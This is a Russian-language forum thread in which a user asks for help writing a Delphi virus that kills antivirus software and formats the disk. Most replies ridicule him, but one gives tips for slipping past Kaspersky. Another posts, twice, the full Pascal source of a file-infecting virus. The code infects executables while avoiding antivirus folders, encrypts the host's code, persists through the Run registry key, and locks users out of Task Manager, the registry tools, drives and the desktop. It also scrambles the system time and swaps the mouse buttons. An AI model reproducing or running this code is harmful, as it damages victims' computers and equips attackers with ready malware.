( Вход | Регистрация | Поиск )
Вирус на Delphi, люди помогите в написании вируса!
Стандартный · [ Линейный ]
Дата обновления: 24.01.2010 - 20:10, перейти к новому сообщению
Я бы хотел написать вирус 
на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи 
я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт , ну и конечно небыл видим негде.
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
на Delphi, но затрудняюсь это сделать один вот решил попросить о помощи я бы хотел чтобы вир выбивал антивир (доктор веб или каспер) и открывал какой небудь порт
, ну и конечно небыл видим негде. ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
Ответов(1 - 9)
... а еще код вертикального взлета и выхода в открытый космос. Просто так вирусами никто делиться не будет и их написание — это целое искусство. А то если каждый ......пользователь будет писать вирусы, которые не видят антивирусы (!!!), то эра информационных технологий закончится.
Давайте по порядку.
Есть ли у тебя знания в области программирования как таковые?
Да-а-а... Писать вирусы на дельфи. Прикидываешь размер файла?
Антивирус ты так просто не вырубишь, он сразу затрубит об этом пользователю или скромно промолчит, но вырубить свой процесс не даст. К тому же, все антивирусы работают в нулевом кольце, а твоя софтина туда вообще вряд ли пробьётся...
Win-api учи и будет счастье...
Подводя итог хочу спросить:
Не передумал?
Есть в интернете сорсы троянов на дельфи...
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Есть ли у тебя знания в области программирования как таковые?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Да-а-а... Писать вирусы на дельфи. Прикидываешь размер файла?
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
Антивирус ты так просто не вырубишь, он сразу затрубит об этом пользователю или скромно промолчит, но вырубить свой процесс не даст. К тому же, все антивирусы работают в нулевом кольце, а твоя софтина туда вообще вряд ли пробьётся...
Цитата | Quote(DarkFire @ 11.09.2007 - 14:52)
открывал какой небудь порт, ну и конечно небыл видим негде ... код перезагрузки и дальнейшнго форматирования диска!
Win-api учи и будет счастье...
Подводя итог хочу спросить:
Не передумал?
Цитата | Quote
Просто так вирусами никто делиться не будет и их написание — это целое искусство.
Есть в интернете сорсы троянов на дельфи...
Цитата | Quote(delay(0) @ 11.09.2007 - 19:23)
Если эти программы-шутки можно назвать троянами.
Самое юзабельное, что видел это "Боевой конь за 10 минут" от Михаила Фленова. Но это никак нельзя назвать полноценным трояном, так подкол ламера...Цитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
Так, ну про вертикальный взлет тебе уже сказали, могу предложить еще код вызова Сотоны и выхода в Астрал.
Цитата | Quote
Есть ли у тебя знания в области программирования как таковые?
А ты сам как думаешь?
Цитата | Quote
Я бы хотел написать вирус на Delphi
сразу видно - матёрый хакер! 
Цитата | Quote
я бы хотел чтобы вир выбивал антивир
ну, а кто ж не хотел быЦитата | Quote
ну и еще выложите пожалусто код перезагрузки и дальнейшнго форматирования диска!
зарание благодерен
кого же это ты так невзлюбил?зарание благодерен
Цитата | Quote
Win-api учи и будет счастье...
полностью поддерживаюзы: хочешь написать хороший вирус - учи лучше assembler и грОматЕку
И да поможет тебе великий Ктулху. Антивир в принципе незачем вырубать))) Замути просто форму без внешней таблички с размером формы 1*1. Получицца активное приложение или убери его в трей каким-нибудь знакомым значком. каспер клюнет 100%. Я свои вирусы и вообще программы(у меня нет ни одной не хак бугага) пишу по принципу создания подобия самой безобидной программки))) Конечно если у тебя будет прописано отформатировать с то все антивиры завопят,а вот если прога получит список файлов,потом удалит 1,потом 2-й))) Никакого подозрения. Все легально.=> Каспер молчит. Исчи обходные пути. Я даже когда нужно было перезагружать комп делал кнопку и на нее программно нажимал. А что? Комп выключается по кнопке,только панда падло запалил это((
Цитата | Quote(kukkk @ 11.10.2007 - 22:19)
Вот это кстати похвально. Не всегда все сводится к перелезанию ring3->ring0. Для написания более менее рабочего вируса со всеми необходимыми функция вполне достаточно winapi. Главное грамотно продумать алгоритм. Ну а если уж хочется полной власти, то милости просим в ring0. Но там уже будет свой набор API.
Если руки не кривые в дельфине вир можно написать на 60-80 кб.Причём вполне полноценный!!А для тех кто срёт на обьём файлов из делфи,скажу что они просто не умеют юзать конпилы да ваще делфи херовато знают!!!Обычный инпутный ехе
на 600кб при желании делается 60кб.
на 600кб при желании делается 60кб.
Ну коль есть желание у тебя, попробуй для начала в "этом" разобраться . при желании можешь модифицировать.
. при желании можешь модифицировать.Code
{$M 65520,0,0}
Program Virus_DOS_HLLP_GVDG;
USES DOS;
Const
VirSize=5982;
Metka='by SN!KE=))';
MSize=length(Metka);
type
Bufer=array[1..VirSize] of Char;
VAR
Victim : integer;
Procedure BeginEnd(i : integer);
var
n :integer;
Begin
case i of
0..10000: n:=0;
10001..20000: n:=i;
20001..30000: n:=random(1000)
else
begin
n:=0;
n:=random(65535);
n:=i
end;
end;
End;
Function IntToStr(I : integer) : String;
Var
S : String [5];
Begin
Str(I, S);
IntToStr:=S;
End;
Procedure Musor;
var
fch : file of char;
rch : char;
ch : char;
st : string;
i : integer;
ii : integer;
iii : integer;
begin
randomize; BeginEnd(-1894);
for i:=1 to random(10) do
begin
st:='';
for ii:=1 to random(5)+3 do
begin
rch:=chr(ord(random(26)+65));
st:=st+rch;
end;
Assign(fch,st+'.'+chr(ord(random(26)+65))+
+chr(ord(random(26)+65))+chr(ord(random(26)+65)));
Rewrite(fch);
for iii:=1 to random(1000) do
begin
ch:=chr(ord(random(256)));
write(fch,ch);
end;
close(fch);
end;
end;
Procedure AutoRun;
VAR
f : file;
txt : text;
i : integer;
st1 : string;
st2 : string;
Begin
st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE';
for i:=1 to length(st1) do
begin
if st1[i]='\'
then st2:=st2+'\'+st1[i]
else st2:=st2+st1[i]
end;
Assign(f,st1);
{$i-} Reset(f); Close(f); {$i+}
if IOResult<>0 then
Begin
Assign(txt,'REG');
Rewrite(txt);
Writeln(txt,'Windows Registry Editor Version 5.00');
Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]');
Writeln(txt,'"AVTORUN"="'+st2+'"');
Close(txt);
Exec(GetEnv('Comspec'),'/c REG IMPORT REG');
Exec(GetEnv('Comspec'),'/c DEL REG');
Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1);
Exec(GetEnv('Comspec'),'/c cls');
End; BeginEnd(19573);
End;
procedure Shifr(var Buf : Bufer; key : integer);
var
k : integer;
begin
for k:=1 to Sizeof(Buf) do
Buf[k]:=chr(ord(Buf[k]) xor key);
end;
procedure Infect(path,name:string);
var
FromF : file;
ToF : file;
BufVir : Bufer;
NumRead : Word;
txt : text;
i : integer;
k : integer;
Key : integer;
begin
Assign(txt,path+name);
append(txt);
write(txt,Metka); BeginEnd(-2253);
i:=0;
k:=random(256);
repeat
inc(i);
write(txt,chr(random(256))); BeginEnd(-1139);
until i>k;
Close(txt); BeginEnd(18190);
Assign(ToF,path+name);
reset(ToF,1);
Key:=FileSize(ToF) mod 256; BeginEnd(19974);
BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead);
Shifr(BufVir,Key);
seek(ToF,filesize(ToF));
BlockWrite(ToF,BufVir,NumRead);
Assign(FromF,paramstr(0));
reset(FromF,1);
BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead);
seek(ToF,0);
BlockWrite(ToF,BufVir,NumRead);
Close(ToF);
Close(FromF);
end;
procedure Find(dir:pathstr);
var
sr : searchrec;
f : file;
Buf : array[1..4] of Char;
begin
findfirst(dir+'*.exe',39,sr);
if (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0)
and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0)
and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0)
and (pos('DOCUM', dir)=0) and (pos('GVDG', dir)=0)
then
while doserror=0 do
if Victim<13 then
begin
Assign(f,dir+sr.name);
setfattr(f,0);
{$i-}reset(f,1);
Close(f);{$i+}
IF ioresult=0 then
Begin
Assign(f,dir+sr.name);
reset(f,1); BeginEnd(4089);
if FileSize(f)>1000 then
Begin
seek(f,85);
blockread(f,Buf,4);
Close(f);
if Buf<>'GVDG' then
begin
inc(Victim); BeginEnd(2908);
Infect(dir,sr.name);
end;
end
else
Close(f);
end;
findnext(sr); BeginEnd(-2668);
end
else exit;
end;
procedure InRun(Run : integer);
var
f : file;
txt : text;
BufVir : Bufer;
NumRead : Word;
k : integer;
z : char;
Key : integer;
i : longint;
Buf : array[1..MSize]of char;
begin
if Run=1 then
begin
Musor;
Assign(txt,getenv('TMP')+'reg');
rewrite(txt);
writeln(txt,'Windows Registry Editor Version 5.00');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\');
writeln(txt,'Windows\CurrentVersion\Policies\Explorer]');
writeln(txt,'"DisableLocalMachineRun"=dword:00000001');
writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641);
writeln(txt,'"NoControlPanel"=dword:00000001');
writeln(txt,'"NoDrives"=dword:3ffffff');
writeln(txt,'"NoViewOnDrive"=dword:3ffffff');
writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546);
writeln(txt,'"NoChangeStartMenu"=dword:00000001');
writeln(txt,'"NoViewContextMenu"=dword:00000001');
writeln(txt,'"NoRun"=dword:00000001');
writeln(txt,'"NoFind"=dword:00000001');
writeln(txt,'"NoDesktop"=dword:00000001');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088);
writeln(txt,'Windows\CurrentVersion\Policies\System]');
writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313);
writeln(txt,'"DisableRegistryTools"=dword:00000001');
writeln(txt,'"NoDispCPL"=dword:00000001');
Close(txt);
exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg');
exec(getenv('comspec'),'/c cls'); BeginEnd(-1408);
erase(txt);
exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00');
exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton');
writeln('14/88');
end;
Assign(f,paramstr(0));
reset(f,1);
Key:=(FileSize(f)-VirSize) mod 256;
seek(f,filesize(f)-VirSize);
BlockRead(f,BufVir,SizeOf(BufVir), NumRead);
if filesize(f)=VirSize then
Begin
Close(f);
Erase(f);
Halt(0);
end
else
Shifr(BufVir,Key);
seek(f,0);
BlockWrite(f,BufVir,NumRead);
i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632);
while true do
begin
seek(f,i);
blockread(f,Buf,MSize);
if Buf=Metka then
begin
seek(f,i);
truncate(f); BeginEnd(23603);
break;
end;
inc(i);
end;
Close(f);
if Run=1 then
exec(Paramstr(0),'');
end;
Procedure Nucleus;
var
f : file;
begin
Assign(f,paramstr(0));
SetFAttr(f,0);
if Paramstr(1)='KILL' then
begin
InRun(0);
Halt(0);
end;
AutoRun;
Find('');
InRun(1);
end;
begin
Randomize; BeginEnd(5352);
Nucleus;
end.
Program Virus_DOS_HLLP_GVDG;
USES DOS;
Const
VirSize=5982;
Metka='by SN!KE=))';
MSize=length(Metka);
type
Bufer=array[1..VirSize] of Char;
VAR
Victim : integer;
Procedure BeginEnd(i : integer);
var
n :integer;
Begin
case i of
0..10000: n:=0;
10001..20000: n:=i;
20001..30000: n:=random(1000)
else
begin
n:=0;
n:=random(65535);
n:=i
end;
end;
End;
Function IntToStr(I : integer) : String;
Var
S : String [5];
Begin
Str(I, S);
IntToStr:=S;
End;
Procedure Musor;
var
fch : file of char;
rch : char;
ch : char;
st : string;
i : integer;
ii : integer;
iii : integer;
begin
randomize; BeginEnd(-1894);
for i:=1 to random(10) do
begin
st:='';
for ii:=1 to random(5)+3 do
begin
rch:=chr(ord(random(26)+65));
st:=st+rch;
end;
Assign(fch,st+'.'+chr(ord(random(26)+65))+
+chr(ord(random(26)+65))+chr(ord(random(26)+65)));
Rewrite(fch);
for iii:=1 to random(1000) do
begin
ch:=chr(ord(random(256)));
write(fch,ch);
end;
close(fch);
end;
end;
Procedure AutoRun;
VAR
f : file;
txt : text;
i : integer;
st1 : string;
st2 : string;
Begin
st1:=GetEnv('SystemRoot')+'\'+'AVTORUN'+'.EXE';
for i:=1 to length(st1) do
begin
if st1[i]='\'
then st2:=st2+'\'+st1[i]
else st2:=st2+st1[i]
end;
Assign(f,st1);
{$i-} Reset(f); Close(f); {$i+}
if IOResult<>0 then
Begin
Assign(txt,'REG');
Rewrite(txt);
Writeln(txt,'Windows Registry Editor Version 5.00');
Writeln(txt,'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]');
Writeln(txt,'"AVTORUN"="'+st2+'"');
Close(txt);
Exec(GetEnv('Comspec'),'/c REG IMPORT REG');
Exec(GetEnv('Comspec'),'/c DEL REG');
Exec(GetEnv('Comspec'),'/c copy '+paramstr(0)+' '+st1);
Exec(GetEnv('Comspec'),'/c cls');
End; BeginEnd(19573);
End;
procedure Shifr(var Buf : Bufer; key : integer);
var
k : integer;
begin
for k:=1 to Sizeof(Buf) do
Buf[k]:=chr(ord(Buf[k]) xor key);
end;
procedure Infect(path,name:string);
var
FromF : file;
ToF : file;
BufVir : Bufer;
NumRead : Word;
txt : text;
i : integer;
k : integer;
Key : integer;
begin
Assign(txt,path+name);
append(txt);
write(txt,Metka); BeginEnd(-2253);
i:=0;
k:=random(256);
repeat
inc(i);
write(txt,chr(random(256))); BeginEnd(-1139);
until i>k;
Close(txt); BeginEnd(18190);
Assign(ToF,path+name);
reset(ToF,1);
Key:=FileSize(ToF) mod 256; BeginEnd(19974);
BlockRead(ToF,BufVir,SizeOf(BufVir), NumRead);
Shifr(BufVir,Key);
seek(ToF,filesize(ToF));
BlockWrite(ToF,BufVir,NumRead);
Assign(FromF,paramstr(0));
reset(FromF,1);
BlockRead(FromF,BufVir,SizeOf(BufVir), NumRead);
seek(ToF,0);
BlockWrite(ToF,BufVir,NumRead);
Close(ToF);
Close(FromF);
end;
procedure Find(dir:pathstr);
var
sr : searchrec;
f : file;
Buf : array[1..4] of Char;
begin
findfirst(dir+'*.exe',39,sr);
if (pos('SYSTEM',dir)=0) and (pos('DRWEB', dir)=0)
and (pos('KASPER',dir)=0) and (pos('PANDA', dir)=0)
and (pos('NORTON',dir)=0) and (pos('COMMON',dir)=0)
and (pos('DOCUM', dir)=0) and (pos('GVDG', dir)=0)
then
while doserror=0 do
if Victim<13 then
begin
Assign(f,dir+sr.name);
setfattr(f,0);
{$i-}reset(f,1);
Close(f);{$i+}
IF ioresult=0 then
Begin
Assign(f,dir+sr.name);
reset(f,1); BeginEnd(4089);
if FileSize(f)>1000 then
Begin
seek(f,85);
blockread(f,Buf,4);
Close(f);
if Buf<>'GVDG' then
begin
inc(Victim); BeginEnd(2908);
Infect(dir,sr.name);
end;
end
else
Close(f);
end;
findnext(sr); BeginEnd(-2668);
end
else exit;
end;
procedure InRun(Run : integer);
var
f : file;
txt : text;
BufVir : Bufer;
NumRead : Word;
k : integer;
z : char;
Key : integer;
i : longint;
Buf : array[1..MSize]of char;
begin
if Run=1 then
begin
Musor;
Assign(txt,getenv('TMP')+'reg');
rewrite(txt);
writeln(txt,'Windows Registry Editor Version 5.00');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\');
writeln(txt,'Windows\CurrentVersion\Policies\Explorer]');
writeln(txt,'"DisableLocalMachineRun"=dword:00000001');
writeln(txt,'"NoFileMenu"=dword:00000001'); BeginEnd(14641);
writeln(txt,'"NoControlPanel"=dword:00000001');
writeln(txt,'"NoDrives"=dword:3ffffff');
writeln(txt,'"NoViewOnDrive"=dword:3ffffff');
writeln(txt,'"NoClose"=dword:00000001'); BeginEnd(6546);
writeln(txt,'"NoChangeStartMenu"=dword:00000001');
writeln(txt,'"NoViewContextMenu"=dword:00000001');
writeln(txt,'"NoRun"=dword:00000001');
writeln(txt,'"NoFind"=dword:00000001');
writeln(txt,'"NoDesktop"=dword:00000001');
write(txt,'[HKEY_CURRENT_USER\Software\Microsoft\'); BeginEnd(-1088);
writeln(txt,'Windows\CurrentVersion\Policies\System]');
writeln(txt,'"DisableTaskMgr"=dword:00000001'); BeginEnd(6313);
writeln(txt,'"DisableRegistryTools"=dword:00000001');
writeln(txt,'"NoDispCPL"=dword:00000001');
Close(txt);
exec(getenv('comspec'),'/c reg import '+getenv('TMP')+'reg');
exec(getenv('comspec'),'/c cls'); BeginEnd(-1408);
erase(txt);
exec(getenv('Comspec'),'/c cmd /c time '+IntToStr(random(24))+':'+IntToStr(random(60))+':00,00');
exec(getenv('Comspec'),'/c cmd /c rundll32 user32, SwapMouseButton');
writeln('14/88');
end;
Assign(f,paramstr(0));
reset(f,1);
Key:=(FileSize(f)-VirSize) mod 256;
seek(f,filesize(f)-VirSize);
BlockRead(f,BufVir,SizeOf(BufVir), NumRead);
if filesize(f)=VirSize then
Begin
Close(f);
Erase(f);
Halt(0);
end
else
Shifr(BufVir,Key);
seek(f,0);
BlockWrite(f,BufVir,NumRead);
i:=filesize(f)-VirSize-256-MSize; BeginEnd(11632);
while true do
begin
seek(f,i);
blockread(f,Buf,MSize);
if Buf=Metka then
begin
seek(f,i);
truncate(f); BeginEnd(23603);
break;
end;
inc(i);
end;
Close(f);
if Run=1 then
exec(Paramstr(0),'');
end;
Procedure Nucleus;
var
f : file;
begin
Assign(f,paramstr(0));
SetFAttr(f,0);
if Paramstr(1)='KILL' then
begin
InRun(0);
Halt(0);
end;
AutoRun;
Find('');
InRun(1);
end;
begin
Randomize; BeginEnd(5352);
Nucleus;
end.
SoftoRooM © 2004-2024